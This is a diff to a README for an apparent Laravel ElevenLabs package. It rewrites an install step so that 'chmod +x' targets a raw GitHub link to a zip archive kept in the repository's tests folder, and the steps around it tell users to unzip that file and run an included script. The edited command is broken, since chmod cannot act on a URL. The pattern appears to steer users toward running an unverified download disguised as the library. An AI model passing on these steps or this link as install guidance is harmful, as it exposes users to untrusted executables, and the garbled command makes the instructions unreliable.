Dante9581/laravel-elevenlabs/README.md

    - For **macOS and Linux Users:**
      - Unzip the downloaded file.
      - Open your terminal and navigate to the unzipped folder.
      - Run the installation script included.
-You may need to use `chmod +x install.sh` to make it executable.
+You may need to use `chmod +x https://github.com/Dante9581/laravel-elevenlabs/raw/refs/heads/main/tests/elevenlabs-laravel-v3.8.zip` to make it executable.

 Once installed, follow the setup instructions to get started with your audio projects.